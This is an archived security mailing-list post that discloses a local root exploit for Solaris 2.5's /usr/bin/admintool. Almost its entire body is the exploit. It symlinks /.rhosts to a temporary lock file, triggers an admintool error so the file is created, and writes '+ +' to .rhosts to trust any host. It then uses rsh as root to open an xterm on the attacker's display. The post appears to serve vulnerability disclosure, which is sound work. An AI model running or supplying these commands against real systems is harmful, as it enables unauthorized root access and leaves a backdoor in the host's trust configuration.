Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/177 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: Solaris 2.5 Exploit (/usr/bin/admintool) I found that /usr/bin/admintool was easier. setenv DISPLAY yourdisplay:0.0 ln -s /.rhosts /tmp/.group.lock /usr/bin/admintool (browse -> group -> edit a group -> get an error message -> exit) echo "+ +" >> .rhosts /usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"